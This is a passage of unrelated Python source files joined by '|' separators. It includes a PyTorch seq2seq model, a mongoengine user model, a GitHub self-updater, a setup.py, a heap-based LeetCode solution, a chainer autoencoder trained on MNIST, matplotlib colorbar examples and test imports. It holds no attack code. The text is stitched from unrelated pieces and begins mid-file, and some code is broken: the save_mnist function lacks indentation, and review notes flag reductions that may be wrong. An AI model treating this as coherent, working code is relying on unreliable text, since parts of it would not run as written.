    print('The type of analysis has been wrongly defined. Introduce \'profile_creation\' or \'comparison\'')
    sys.exit(10)
|
from __future__ import print_function
import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from torch.nn.utils.rnn import PackedSequence, pack_padded_sequence, pad_packed_sequence
class Vocabulary(object):
    """Bidirectional token <-> id mapping with an unknown-token fallback."""

    def __init__(self, tokens, unk_idx):
        """Build forward (token->id) and backward (id->token) lookup tables."""
        self.tokens = tokens
        self.unk_idx = unk_idx
        self.vocab_size = len(tokens)
        self.forward_dict = {tok: idx for idx, tok in enumerate(tokens)}
        self.backward_dict = {idx: tok for idx, tok in enumerate(tokens)}

    def encode(self, tokens):
        """Map tokens to ids, using unk_idx for unknown tokens."""
        lookup = self.forward_dict
        return [lookup.get(tok, self.unk_idx) for tok in tokens]

    def decode(self, ids):
        """Map ids back to tokens, using "<UNK>" for out-of-range ids."""
        lookup = self.backward_dict
        return [lookup.get(i, "<UNK>") for i in ids]

    def batch_encode(self, inputs):
        """Encode a batch of token sequences, right-padding with id 0."""
        encoded = [self.encode(seq) for seq in inputs]
        width = max(len(ids) for ids in encoded)
        return [ids + [0] * (width - len(ids)) for ids in encoded]

    def __len__(self):
        return len(self.tokens)
class Bilinear(nn.Module):
    """
    Bilinear map: output[b, k] = sum_ij input1[b, i] * W[i, j, k] * input2[b, j].

    Weights are double precision and learned (requires_grad=True).
    """
    def __init__(self, first_dim, second_dim, out_dim):
        super(Bilinear, self).__init__()
        self.first_dim = first_dim
        self.second_dim = second_dim
        self.out_dim = out_dim
        # Random-normal initialised weight tensor of shape
        # (first_dim, second_dim, out_dim).
        self.weights = nn.Parameter(data=th.randn(first_dim, second_dim, out_dim).double(),
                                    requires_grad=True)

    def forward(self, input1, input2):
        # preconditions
        assert input1.ndimension() == 2, "Inputs must be matrices (2-dimensional). Input 1 has {} dimensions.".format(input1.ndimension())
        assert input2.ndimension() == 2, "Inputs must be matrices (2-dimensional). Input 2 has {} dimensions.".format(input2.ndimension())
        assert input1.size(1) == self.first_dim, "Input 1's shape is inconsistent with the bilinear weight matrix."
        assert input2.size(1) == self.second_dim, "Input 2's shape is inconsistent with the bilinear weight matrix."
        assert input1.size(0) == input2.size(0), """Input batch sizes must be equal.
        Input 1 has batch size {}, while input 2 has batch size {}.""".format(input1.size(0), input2.size(0))

        # computation: broadcast both inputs and the weights to a common
        # (batch, first, second, out) shape, multiply elementwise, reduce.
        batch_size = input1.size(0)
        input1_expanded = input1.unsqueeze(2).unsqueeze(3).expand(batch_size, self.first_dim,
                                                                  self.second_dim, self.out_dim)
        input2_expanded = input2.unsqueeze(1).unsqueeze(3).expand(batch_size, self.first_dim,
                                                                  self.second_dim, self.out_dim)
        weights_expanded = self.weights.unsqueeze(0).expand(batch_size, self.first_dim,
                                                            self.second_dim, self.out_dim)
        # NOTE(review): .sum(1).sum(2) followed by .squeeze(1).squeeze(1)
        # appears to assume the old (pre-0.2) torch behaviour where sum()
        # kept the reduced dimension; on modern torch this reduces different
        # axes. Confirm the targeted torch version before changing.
        output = (weights_expanded*input1_expanded*input2_expanded).sum(1).sum(2)
        return output.squeeze(1).squeeze(1)
class EncoderRNN(nn.Module):
    """Embedding + single-layer LSTM encoder (double precision, batch-first)."""

    def __init__(self, vocab, embed_dim, hidden_dim):
        super(EncoderRNN, self).__init__()
        self.vocab = vocab
        self.vocab_size = len(vocab)
        embedding = nn.Embedding(self.vocab_size, embed_dim)
        embedding.double()
        rnn = nn.LSTM(embed_dim, hidden_dim, batch_first=True, bias=False)
        rnn.double()
        self.embedding = embedding
        self.rnn = rnn

    def forward(self, input, h0, c0, lens=None):
        """Run the LSTM over the embedded input.

        When lens is given the embedded batch is packed first, so padding
        does not contribute to the hidden states.
        """
        emb = self.embedding(input)
        rnn_input = pack_padded_sequence(emb, lens, batch_first=True) if lens else emb
        output, (hn, cn) = self.rnn(rnn_input, (h0, c0))
        return output, hn, cn

    def load_embeddings(self, weights, fix_weights=True):
        """Replace the embedding weights, optionally freezing them."""
        self.embedding.weight.data = weights
        if fix_weights:
            self.embedding.weight.requires_grad = False
class DecoderRNN(nn.Module):
    """
    LSTM decoder over an output vocabulary.

    Wraps an EncoderRNN (embedding + LSTM) and scores each hidden state over
    the vocabulary with a log-softmax layer.  Provides beam search plus
    (unimplemented) greedy and temperature-sampling decoders.
    """
    def __init__(self, vocab, start_idx, end_idx, embed_dim, hidden_dim):
        super(DecoderRNN, self).__init__()
        self.vocab = vocab
        # Token ids delimiting a generated sequence.
        self.start_idx = start_idx
        self.end_idx = end_idx
        # Reuse EncoderRNN as the embedding+LSTM stack over shifted outputs.
        self.encoder = EncoderRNN(vocab, embed_dim, hidden_dim)
        self.scorer = nn.Sequential(nn.Linear(hidden_dim, len(vocab)),
                                    nn.LogSoftmax())
        self.scorer.double()
    def load_embeddings(self, weights, fix_weights=True):
        # Delegate to the wrapped encoder's embedding table.
        self.encoder.load_embeddings(weights, fix_weights)
    def forward(self, input, h0, c0, lens=None):
        """Return (log-probs over vocab per step, h_n, c_n)."""
        output, hn, cn = self.encoder(input, h0, c0, lens)
        if lens:
            # Encoder returned a PackedSequence; restore padded form.
            output, _ = pad_packed_sequence(output)
        # Flatten to (batch*seq, hidden) for scoring, then reshape back.
        logprobs = self.scorer(output.contiguous().view(output.size(0)*output.size(1), output.size(2)))
        logprobs = logprobs.view(output.size(0), output.size(1), logprobs.size(1))
        return logprobs, hn, cn
    def generate(self, h0, c0, method="beam", **kwargs):
        """Decode token ids from initial states and map them back to tokens."""
        # Dispatch table over decoding strategies.
        generator = {"greedy": self.greedy_decode,
                     "beam": self.beam_decode,
                     "sample": self.temperature_sample}.get(method)
        ids = generator(h0, c0, **kwargs)
        tokens = self.vocab.decode(ids)
        return tokens
    def temperature_sample(self, h0, c0, temp=1, max_length=20, **kwargs):
        # TODO: not implemented — returns None.
        pass
    def greedy_decode(self, h0, c0, max_length=20, **kwargs):
        # TODO: not implemented — returns None.
        pass
    def beam_decode(self, h0, c0, beam_size=5, max_length=10, cuda=False, **kwargs):
        """Beam search from (h0, c0); returns the token-id list of a completed
        hypothesis.  Relies on legacy PyTorch Variable/.data[0] semantics."""
        def get_ij(idx, n):
            # Unflatten an index over a (beam, vocab) score matrix.
            # NOTE(review): '/' here assumes integer (floor) division of the
            # index tensor — Python-2 / old-PyTorch behavior; confirm on py3.
            j = idx % n
            i = (idx - j)/n
            return i, j
        beam = []
        completed = []
        # Completed-hypothesis score threshold; candidates below it are cut.
        prune_factor = float("-inf")
        start_symbol = Variable(th.LongTensor([self.start_idx]))
        beam_symbols = start_symbol.unsqueeze(1)
        if cuda:
            start_symbol = start_symbol.cuda()
            beam_symbols = beam_symbols.cuda()
        # First expansion: score every vocabulary item after the start symbol.
        scores, out_h, out_c = self.forward(beam_symbols, h0, c0)
        top_scores, top_ids = scores.view(scores.numel()).sort(0, True)
        _, dim_beam, dim_vocab = scores.size()
        for idx in range(min(beam_size, dim_vocab)):
            i, j = get_ij(top_ids[idx], dim_vocab)
            if cuda:
                j = j.cuda()
            seq = th.cat([start_symbol, j])
            score = top_scores[idx]
            if j.data[0] == self.end_idx:
                # Ended immediately: record it and tighten the prune threshold.
                completed.append({"seq": seq.data.tolist(), "score": score})
                prune_factor = top_scores[idx].data[0]
            else:
                beam.append({"seq": seq, "h": out_h[:, 0, :],
                             "c": out_c[:, 0, :], "score": score})
        count = 0
        while len(beam) > 0 and count < max_length:
            # Batch the live hypotheses: last symbol plus LSTM states of each.
            beam_symbols = th.cat([item["seq"][-1].unsqueeze(1) for item in beam], 0)
            beam_h = th.cat([item["h"].unsqueeze(1) for item in beam], 1)
            beam_c = th.cat([item["c"].unsqueeze(1) for item in beam], 1)
            log_probs, out_h, out_c = self.forward(beam_symbols, beam_h, beam_c)
            dim_beam, _, dim_vocab = log_probs.size()
            # Cumulative score of every candidate extension.
            beam_scores = th.cat([item["score"] for item in beam]).unsqueeze(1).unsqueeze(1)
            beam_scores = beam_scores.expand(dim_beam, 1, dim_vocab)
            scores = beam_scores + log_probs
            top_scores, top_ids = scores.view(scores.numel()).sort(0, True)
            new_beam = []
            for idx in range(min(beam_size, len(beam))):
                score = top_scores[idx]
                i, j = get_ij(top_ids[idx], dim_vocab)
                if (score.data[0] >= prune_factor):
                    seq = th.cat([beam[i.data[0]]["seq"], j])
                    if j.data[0] == self.end_idx:
                        completed.append({"seq": seq.data.tolist(), "score": score})
                        prune_factor = score.data[0]
                    else:
                        new_beam.append({"seq": seq, "h": out_h[:, i.data[0], :],
                                         "c": out_c[:, i.data[0], :], "score": score})
                else:
                    # Candidates are sorted, so no later one can survive either.
                    break
            beam = new_beam
            count += 1
        # NOTE(review): returns the most recently completed hypothesis, not
        # necessarily the best-scoring one — confirm this is intentional.
        return completed[-1]["seq"]
class Seq2Seq(nn.Module):
    """
    Encoder-decoder model.

    Encodes the input sequence, maps the final encoder LSTM states through a
    `transfer` module, and decodes from the transferred states.  The initial
    encoder states h0/c0 are learned parameters.
    """
    def __init__(self, in_vocab, out_vocab, in_embed_dim,
                 out_embed_dim, hidden_dim, transfer):
        super(Seq2Seq, self).__init__()
        self.in_vocab = in_vocab
        self.out_vocab = out_vocab
        self.hidden_dim = hidden_dim
        # Learned initial LSTM states, double to match the encoders.
        self.h0 = nn.Parameter(th.randn(1, 1, hidden_dim).double())
        self.c0 = nn.Parameter(th.randn(1, 1, hidden_dim).double())
        self.encoder = EncoderRNN(in_vocab, in_embed_dim, hidden_dim)
        # NOTE(review): start/end token ids are hard-coded as 1 and 2 —
        # confirm out_vocab actually reserves those ids.
        self.decoder = DecoderRNN(out_vocab, 1, 2,
                                  out_embed_dim, hidden_dim)
        self.transfer = transfer
    def forward(self, input, output, input_lens=None, output_lens=None, lookup=None, **kwargs):
        """Teacher-forced pass: returns decoder log-probs for `output`."""
        # Broadcast the learned initial states across the batch.
        h0 = self.h0.expand(1, input.size(0), self.hidden_dim).contiguous()
        c0 = self.c0.expand(1, input.size(0), self.hidden_dim).contiguous()
        input_encoded, input_h, input_c = self.encoder(input, h0, c0, lens=input_lens)
        if lookup:
            # Reorder final states (e.g. to undo length-sorting for packing).
            input_h = th.index_select(input_h, 1, lookup)
            input_c = th.index_select(input_c, 1, lookup)
        transfer_h, transfer_c = self.transfer(input_h, input_c, **kwargs)
        log_probs, _, _ = self.decoder(output, transfer_h, transfer_c, lens=output_lens)
        return log_probs
    def generate(self, input_seq, method="beam", cuda=False, **kwargs):
        """Encode one whitespace-tokenized string and decode a reply string."""
        input_ids = self.in_vocab.encode(input_seq.split(" "))
        input = Variable(th.LongTensor(input_ids)).unsqueeze(0)
        # NOTE(review): zero float32 initial states here, while training uses
        # the learned double-precision h0/c0 — confirm this is intended.
        h0 = Variable(th.zeros(1, 1, self.hidden_dim).contiguous())
        c0 = Variable(th.zeros(1, 1, self.hidden_dim).contiguous())
        if cuda:
            input = input.cuda()
            h0 = h0.cuda()
            c0 = c0.cuda()
        input_encoded, input_h, input_c = self.encoder(input, h0, c0)
        transfer_h, transfer_c = self.transfer(input_h, input_c, **kwargs)
        output = self.decoder.generate(transfer_h, transfer_c, method=method, cuda=cuda, **kwargs)
        return " ".join(output)
class IdentityTransfer(nn.Module):
    """Pass-through transfer: returns the encoder states unchanged."""
    def __init__(self):
        super(IdentityTransfer, self).__init__()
    def forward(self, h, c, **kwargs):
        # No transformation at all — hand both states straight back.
        return (h, c)
class GatedBilinearTransfer(nn.Module):
    """
    Gated bilinear transformation of LSTM states.

    Runs Bilinear -> tanh -> Bilinear, conditioned on the gate input ``g``,
    over h, c, or both, as selected by ``target`` ("h", "c", or "both").
    """
    def __init__(self, in_dim, gate_dim, hidden_dim,
                 out_dim, target="h"):
        super(GatedBilinearTransfer, self).__init__()
        self.target = target
        self.in_bilinear = Bilinear(in_dim, gate_dim, hidden_dim)
        self.tanh = nn.Tanh()
        self.out_bilinear = Bilinear(hidden_dim, gate_dim, out_dim)
    def _transform(self, state, g):
        # Drop the leading layer dim, apply the gated stack, restore the dim.
        hidden = self.tanh(self.in_bilinear(state.squeeze(0), g))
        return self.out_bilinear(hidden, g).unsqueeze(0)
    def forward(self, h, c, g, **kwargs):
        if self.target in ("h", "both"):
            h = self._transform(h, g)
        if self.target in ("c", "both"):
            c = self._transform(c, g)
        return h, c
class PairClassifier(nn.Module):
    """
    A classifier for pairs of sequences.

    Each sequence is encoded by its own EncoderRNN; a caller-supplied
    ``pair_encoder`` combines the two encodings into one vector of width
    ``class_dim``, which a feed-forward stack maps to class log-probs.
    """
    def __init__(self, vocab_1, vocab_2, embed_dim_1, embed_dim_2,
                 hidden_dim, class_dim, pair_encoder, n_layers,
                 n_classes, class_hidden_dim):
        super(PairClassifier, self).__init__()
        # Kept so forward() can size the zero initial LSTM states.
        self.hidden_dim = hidden_dim
        # Bug fix: parameters were misspelled ('voab_1') vs. their uses.
        self.first_encoder = EncoderRNN(vocab_1, embed_dim_1, hidden_dim)
        self.second_encoder = EncoderRNN(vocab_2, embed_dim_2, hidden_dim)
        self.pair_encoder = pair_encoder
        # Bug fix: nn.Sequential has no .add(); collect layers, then unpack.
        layers = [nn.Linear(class_dim, class_hidden_dim), nn.Tanh()]
        for _ in range(n_layers):
            layers.append(nn.Linear(class_hidden_dim, class_hidden_dim))
            layers.append(nn.Tanh())
        layers.append(nn.Linear(class_hidden_dim, n_classes))
        layers.append(nn.LogSoftmax())
        self.classifier = nn.Sequential(*layers)
    def forward(self, input_1, input_2):
        """Return class log-probabilities for a batch of sequence pairs."""
        # NOTE(review): the original called the encoders without the required
        # h0/c0 (and with misspelled names); zero double-precision states are
        # supplied here — confirm this matches how the model is trained.
        h0_1 = Variable(th.zeros(1, input_1.size(0), self.hidden_dim).double())
        c0_1 = Variable(th.zeros(1, input_1.size(0), self.hidden_dim).double())
        h0_2 = Variable(th.zeros(1, input_2.size(0), self.hidden_dim).double())
        c0_2 = Variable(th.zeros(1, input_2.size(0), self.hidden_dim).double())
        h_1, hn_1, cn_1 = self.first_encoder(input_1, h0_1, c0_1)
        h_2, hn_2, cn_2 = self.second_encoder(input_2, h0_2, c0_2)
        encoded = self.pair_encoder(h_1, hn_1, cn_1, h_2, hn_2, cn_2)
        probs = self.classifier(encoded)
        return probs
class ConcatPairClassifier(PairClassifier):
    """
    A classifier for pairs of sequences that embeds and then concatenates them.
    """
    def __init__(self, vocab_1, vocab_2, embed_dim_1, embed_dim_2,
                 hidden_dim, n_layers, n_classes, class_hidden_dim):
        # Concatenation-based pair encoder: join the two final hidden states,
        # so the classifier input width is twice the encoder hidden size.
        def concat_pair(h_1, hn_1, cn_1, h_2, hn_2, cn_2):
            return th.cat([hn_1.squeeze(0), hn_2.squeeze(0)], 1)
        # Bug fix: the original called super(PairClassifier, ...), which skips
        # PairClassifier.__init__ entirely; it must name this class.
        super(ConcatPairClassifier, self).__init__(
            vocab_1, vocab_2, embed_dim_1, embed_dim_2,
            hidden_dim, 2 * hidden_dim, concat_pair, n_layers,
            n_classes, class_hidden_dim)
|
import mongoengine as db
class User(db.Document):
    """MongoDB user document with symmetric links to other users."""
    user_id = db.StringField(required=True, unique=True)
    created = db.DateTimeField(required=True)
    last_login = db.DateTimeField()
    nino = db.StringField()
    # Bug fix: default=[] is a single shared mutable list across all
    # documents; pass the list *callable* so each document gets its own.
    linked_ids = db.ListField(db.ReferenceField('User'), default=list)
    def link(self, other):
        """Create a two-way link between this user and *other* (atomic pushes)."""
        self.update(push__linked_ids=other)
        other.update(push__linked_ids=self)
|
'''
Module that update the software and its databases
'''
import os
import shutil
from sys import exit
import os.path
import tarfile
import requests
from bs4 import BeautifulSoup
from ...base import *
from ...sentry import sentry
from ...clint import progress
class Updater(object):
    '''
    Checks GitHub for the latest release of the software, downloads the
    release tarball and swaps it into the install path.
    '''
    def __init__(self, path, ver, url):
        self.inst_path = path   # directory the software is installed in
        self.repo_url = url     # GitHub releases page to poll
        self.version = ver      # currently-installed version string
    def update_all(self):
        '''
        Upgrade BigBrother completely
        '''
        print(color.info.info("Fetching version from Github..."))
        # Retrieving github releases
        try:
            response = requests.get(self.repo_url)
        except requests.exceptions.RequestException as e:
            print(color.info.error(e))
            return
        # Getting latest release
        soup = BeautifulSoup(response.content, 'html.parser')
        try:  # Parsing info from page
            version = soup.select("ul.tag-references > li > a > span")[0].text
            download_url = "https://github.com" + \
                soup.select(".release-downloads > li > a")[1]['href']
        except Exception as e:
            # Page layout changed or no releases published: report and bail.
            sentry.client.captureException()
            print(color.info.error(e))
            return
        # check version
        if version == self.version:
            print(color.info.info("You have already the latest version"))
        else:
            print(color.info.info("New version " + color.bold(
                "{ver}".format(ver=version)) + " found"))
            # install
            if self.install(self.inst_path, download_url):
                print(color.info.info("Need to be restarted for changes to be effective"))
                exit()
    def install(self, path, url):
        '''
        Download the release at [url] and install it under [path].
        Returns 1 on success, 0 on failure.
        '''
        try:
            # downloaded file name
            dl_file = self.download(url, path)
            if dl_file is None:
                # download() already printed the reason
                raise RuntimeError("download failed")
            # change directory
            os.chdir(path)
            # extract in path directory
            inst_module = self.extract(dl_file)
            # normalize name: strip the "-<version>" suffix from the dir name
            inst_module_norm = inst_module[:inst_module.find('-')]
            if inst_module_norm in os.listdir():
                shutil.rmtree(inst_module_norm)
            shutil.move(inst_module, inst_module_norm)
            print(color.info.info(color.info.success("Installation completed")))
            return 1
        except Exception as e:
            print(color.info.info(color.info.fail("Installation failed")))
            print(color.info.error(e))
            return 0
    def download(self, url, path):
        '''
        Download module from [url] to [path].
        Returns the local file name, or None on failure.
        '''
        # get name of file to download
        local_filename = url.split('/')[-1]
        try:
            stream = requests.get(url, stream=True)
            # KeyError/ValueError: server sent no usable Content-Length
            total_length = int(stream.headers['Content-Length'])
        except (requests.exceptions.RequestException, KeyError, ValueError) as e:
            print(color.info.error(e))
            return
        # change to download dir
        try:
            os.chdir(path)
        except Exception as e:
            print(color.info.error(e))
            return
        # write on file, showing a progress bar sized from Content-Length
        with open(local_filename, 'wb') as f:
            for chunk in progress.bar(stream.iter_content(chunk_size=1024),
                                      label=local_filename, expected_size=(total_length/1024)):
                if chunk:
                    f.write(chunk)
                    f.flush()
        return local_filename
    def extract(self, filename):
        '''
        Extract the tarball [filename] into the current directory and return
        the name of its top-level directory; None on failure.  The archive
        file is removed afterwards in any case.
        '''
        tar = None  # so the finally block is safe if open() itself fails
        try:
            tar = tarfile.open(filename)
            repo = tar.getnames()[0]
            # remove old repo
            if repo in os.listdir():
                shutil.rmtree(repo)
            # extract in current directory
            tar.extractall()
            return repo
        except Exception as e:
            print(color.info.error(e))
            return
        finally:
            if tar is not None:
                tar.close()
            if os.path.isfile(filename):
                os.remove(filename)
|
from venv import _venv
from fabric.api import task
@task
def migrate():
    """
    Apply pending Django database migrations inside the virtualenv.
    """
    command = "python manage.py migrate"
    _venv(command)
@task
def syncdb():
    """
    Run Django's legacy syncdb command inside the virtualenv.
    """
    command = "python manage.py syncdb"
    _venv(command)
|
import sys
import os.path
from xml.etree import ElementTree as et

# Usage: script.py <version> <path-to-csproj>
# Rewrites the <Version> element in the first <PropertyGroup> of the project.
if len(sys.argv) != 3:
    # Bug fix: the message claimed "at least 2" but exactly 2 are required.
    raise Exception("Expected exactly 2 args, {} given!".format(len(sys.argv) - 1))
version = sys.argv[1]
csprojPath = sys.argv[2]
if not os.path.isfile(csprojPath):
    raise Exception("File {} does not exist!".format(csprojPath))
tree = et.parse(csprojPath)
root = tree.getroot()
versionLeaf = root.find('PropertyGroup[1]/Version')
# 'is not None' — ElementTree Elements have surprising truthiness/equality,
# so identity comparison is the documented-correct check here.
if versionLeaf is not None:
    versionLeaf.text = version
tree.write(csprojPath)
|
from setuptools import setup, find_packages
import sys
# Version-conditional backports, appended to install_requires below.
extra_install = []
if sys.version_info <= (3,1):
    # 'futures' backports concurrent.futures to Python 2 / 3.0-3.1.
    extra_install.append('futures')
if sys.version_info <= (3,6):
    # NOTE(review): (3, 6, x) compares greater than (3, 6), so every 3.6.x
    # release is excluded by this test — confirm '< (3, 6)' wasn't intended.
    extra_install.append('pysha3')
setup(
    name="moneywagon",
    version='{{ version }}',  # templated at release time
    description='Next Generation Cryptocurrency Platform',
    long_description=open('README.md').read(),
    author='Chris Priest',
    author_email='cp368202@ohiou.edu',
    url='https://github.com/priestc/moneywagon',
    packages=find_packages(),
    scripts=['bin/moneywagon'],
    include_package_data=True,
    license='LICENSE',
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
    ],
    install_requires=[
        'requests',
        'tabulate',
        'base58',
        'pytz',
        'arrow',
        'bitcoin',
        'beautifulsoup4'
    ] + extra_install
)
|
from heapq import heapify, heappop, heapreplace
class Solution(object):
    def kthSmallest(self, matrix, k):
        """
        Return the k-th smallest element of a row- and column-sorted matrix.

        :type matrix: List[List[int]]
        :type k: int
        :rtype: int

        Runs a k-way merge over the columns: the heap holds one entry per
        column — (smallest remaining value, tuple of the rest of the column).
        """
        # '== 1', not 'is 1': identity comparison on ints is unreliable.
        if len(matrix) == 1:
            return matrix[0][0]
        # Columns of the remaining rows; list() so it is indexable on Py3.
        rest_cols = list(zip(*matrix[1:]))
        # One heap entry per column (len(matrix[0]) columns, which also
        # handles non-square matrices; the original assumed square).
        heap = [(matrix[0][i], rest_cols[i]) for i in range(len(matrix[0]))]
        heapify(heap)
        pops = 0
        while pops < k - 1:
            val, remaining = heap[0]
            if remaining:
                heapreplace(heap, (remaining[0], remaining[1:]))
            else:
                # Column exhausted — heappop (was a NameError: never imported).
                heappop(heap)
            pops += 1
        return heap[0][0]
# Smoke test: the 3rd smallest element of this sorted matrix is 5.
a = [[1,5,10], [4,5,11], [7,8,12]]
s = Solution()
print(s.kthSmallest(a, 3))  # print() keeps this runnable on Python 2 and 3
|
import json, sys, glob, datetime, math, random, pickle, gzip
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import chainer
from chainer import computational_graph as c
from chainer import cuda
import chainer.functions as F
from chainer import optimizers
class AutoEncoder:
    """Single-bottleneck autoencoder on the legacy chainer FunctionSet API:
    two Linear layers (encode/decode) trained full-batch with Adam."""
    def __init__(self, n_units=64):
        self.n_units = n_units  # width of the bottleneck layer
    def load(self, train_x):
        """Bind the training data and build a model sized to its dimensionality."""
        self.N = len(train_x[0])
        self.x_train = train_x
        #
        self.model = chainer.FunctionSet(encode=F.Linear(self.N, self.n_units),
                                         decode=F.Linear(self.n_units, self.N))
        print("Network: encode({}-{}), decode({}-{})".format(self.N, self.n_units, self.n_units, self.N))
        #
        self.optimizer = optimizers.Adam()
        self.optimizer.setup(self.model.collect_parameters())
    def forward(self, x_data, train=True):
        """Reconstruct x_data; returns (mean-squared reconstruction loss, output)."""
        x = chainer.Variable(x_data)
        t = chainer.Variable(x_data)  # the target is the input itself
        h = F.relu(self.model.encode(x))
        y = F.relu(self.model.decode(h))
        return F.mean_squared_error(y, t), y
    def calc(self, n_epoch):
        """Run n_epoch full-batch training steps on the loaded data."""
        for epoch in range(n_epoch):
            self.optimizer.zero_grads()
            loss, y = self.forward(self.x_train)
            loss.backward()
            self.optimizer.update()
            #
            print('epoch = {}, train mean loss={}'.format(epoch, loss.data))
    def getY(self, test_x):
        """Return the model's reconstruction of test_x."""
        self.test_x = test_x
        # Bug fix: this used the *global* x_test instead of the argument,
        # so it only worked when a module-level x_test happened to exist.
        loss, y = self.forward(self.test_x, train=False)
        return y.data
    def getEncodeW(self):
        """Return the encoder layer's weight matrix."""
        return self.model.encode.W
def load_mnist():
    """Load and return the pickled MNIST dataset from ./mnist.pkl."""
    with open('mnist.pkl', 'rb') as fh:
        return pickle.load(fh)
def save_mnist(s,l=28,prefix=""):
n = len(s)
print("exporting {} images.".format(n))
plt.clf()
plt.figure(1)
for i,bi in enumerate(s):
plt.subplot(math.floor(n/6),6,i+1)
bi = bi.reshape((l,l))
plt.imshow(bi, cmap=cm.Greys_r) #Needs to be in row,col order
plt.axis('off')
plt.savefig("output/{}.png".format(prefix))
if __name__=="__main__":
    # Train the autoencoder on the first 2000 MNIST digits and export
    # reconstructions of a held-out slice at increasing training budgets.
    rf = AutoEncoder(n_units=64)
    mnist = load_mnist()
    # Scale pixel values to [0, 1].
    mnist['data'] = mnist['data'].astype(np.float32)
    mnist['data'] /= 255
    x_train = mnist['data'][0:2000]
    x_test = mnist['data'][2000:2036]  # 36 images -> fills a 6x6 grid
    rf.load(x_train)
    save_mnist(x_test,prefix="test")
    # NOTE(review): calc(k) runs k *further* epochs on the same model, so
    # training is cumulative across iterations — confirm that is intended.
    for k in [1,9,90,400,1000,4000]:
        rf.calc(k) # epoch
        yy = rf.getY(x_test)
        ww = rf.getEncodeW()
        save_mnist(yy,prefix="ae-{}".format(k))
    print("\ndone.")
|
""" This file contains code for working on lists and dictionaries. """
def moreThanOne(dict, key):
    """ Checks whether a key maps to a positive value in a dictionary.
    Arguments:
    dict -- the dictionary
    key -- the key
    Returns:
    True if the key exists and its value is at least one, otherwise False
    """
    if key not in dict:
        return False
    return dict[key] > 0
def anyMoreThanOne(dict, keys):
    """ Checks whether any of the given keys maps to a positive value.
    Arguments:
    dict -- the dictionary
    keys -- the keys
    Returns:
    True if any key exists with a value of at least one, otherwise False
    """
    return any(key in dict and dict[key] > 0 for key in keys)
def makeUnique(list):
    """ Removes duplicates, keeping the first occurrence of each element.
    Works for unhashable elements too (list membership, not a set). """
    unique = []
    for item in list:
        if item in unique:
            continue
        unique.append(item)
    return unique
def alphabetical(lst):
    """ Sorts a list of tuples in reverse alphabetical order by the first
    element of each tuple.
    Arguments:
    lst -- the list to sort
    Returns:
    the sorted list
    """
    # Sort ascending (stable), then reverse — identical tie ordering to
    # list(reversed(sorted(...))).
    ordered = sorted(lst, key=lambda pair: pair[0])
    ordered.reverse()
    return ordered
|
# Gallery metadata: human-readable description and (empty) perceptual hash.
desc = 'Color bars'
phash = ''
def plot():
    """Build and return a figure with three standalone horizontal colorbars:
    a continuous one, a discrete one with over/under extensions, and one
    with custom extension lengths.  Imports are local to keep module import
    cheap for the gallery harness.
    """
    import matplotlib as mpl
    from matplotlib import pyplot as pp
    from matplotlib import style
    import numpy as np
    # Make a figure and axes with dimensions as desired.
    fig, ax = pp.subplots(3)
    # Set the colormap and norm to correspond to the data for which
    # the colorbar will be used.
    cmap = mpl.cm.cool
    norm = mpl.colors.Normalize(vmin=-5, vmax=10)
    # ColorbarBase derives from ScalarMappable and puts a colorbar in a
    # specified axes, so it has everything needed for a standalone colorbar.
    # There are many more kwargs, but the following gives a basic continuous
    # colorbar with ticks and labels.
    cb1 = mpl.colorbar.ColorbarBase(
        ax[0],
        cmap=cmap,
        norm=norm,
        orientation='horizontal'
        )
    cb1.set_label('Some Units')
    # The second example illustrates the use of a ListedColormap, a
    # BoundaryNorm, and extended ends to show the "over" and "under" value
    # colors.
    cmap = mpl.colors.ListedColormap(['r', 'g', 'b', 'c'])
    cmap.set_over('0.25')
    cmap.set_under('0.75')
    # If a ListedColormap is used, the length of the bounds array must be one
    # greater than the length of the color list. The bounds must be
    # monotonically increasing.
    bounds = [1, 2, 4, 7, 8]
    norm = mpl.colors.BoundaryNorm(bounds, cmap.N)
    cb2 = mpl.colorbar.ColorbarBase(
        ax[1],
        cmap=cmap,
        norm=norm,
        # to use 'extend', you must
        # specify two extra boundaries:
        boundaries=[0] + bounds + [13],
        extend='both',
        ticks=bounds,  # optional
        spacing='proportional',
        orientation='horizontal'
        )
    cb2.set_label('Discrete intervals, some other units')
    # The third example illustrates the use of custom length colorbar
    # extensions, used on a colorbar with discrete intervals.
    cmap = mpl.colors.ListedColormap(
        [[0., .4, 1.],
         [0., .8, 1.],
         [1., .8, 0.],
         [1., .4, 0.]
         ])
    cmap.set_over((1., 0., 0.))
    cmap.set_under((0., 0., 1.))
    bounds = [-1., -.5, 0., .5, 1.]
    norm = mpl.colors.BoundaryNorm(bounds, cmap.N)
    cb3 = mpl.colorbar.ColorbarBase(
        ax[2],
        cmap=cmap,
        norm=norm,
        boundaries=[-10]+bounds+[10],
        extend='both',
        # Make the length of each extension
        # the same as the length of the
        # interior colors:
        extendfrac='auto',
        ticks=bounds,
        spacing='uniform',
        orientation='horizontal'
        )
    cb3.set_label('Custom extension lengths, some other units')
    return fig
|
import lexer

# Feed a small sample program to the lexer and dump its token stream.
s = "program id; var beto: int; { id = 1234; }"
lexer.lexer.input(s)
for token in lexer.lexer:
    print(token)  # print() form runs under both Python 2 and 3
|
'''
Created on 2013-01-22
@author: levi
'''
import unittest
import time
from path_condition_generator import PathConditionGenerator
from t_core.matcher import Matcher
from t_core.rewriter import Rewriter
from t_core.iterator import Iterator
from t_core.messages import Packet
from t_core.tc_python.frule import FRule
from t_core.tc_python.arule import ARule
from merge_preprocess import MergePreprocessFactory
from police_station_transformation.run1.transformation.HS2S_run1 import HS2S_run1
from police_station_transformation.run1.transformation.HM2M_run1 import HM2M_run1
from police_station_transformation.run1.transformation.HF2F_run1 import HF2F_run1
from police_station_transformation.run1.transformation.HSM2SM_run1 import HSM2SM_run1
from police_station_transformation.run1.transformation.HSF2SF_run1 import HSF2SF_run1
from police_station_transformation.run1.transformation.HMM2MM_run1 import HMM2MM_run1
from police_station_transformation.run1.transformation.HFF2FF_run1 import HFF2FF_run1
from police_station_transformation.run1.backward_matchers.HSM2SMBackS2S_run1LHS import HSM2SMBackS2S_run1LHS
from police_station_transformation.run1.backward_matchers.HSM2SMBackM2M_run1LHS import HSM2SMBackM2M_run1LHS
from police_station_transformation.run1.backward_matchers.HSF2SFBackS2S_run1LHS import HSF2SFBackS2S_run1LHS
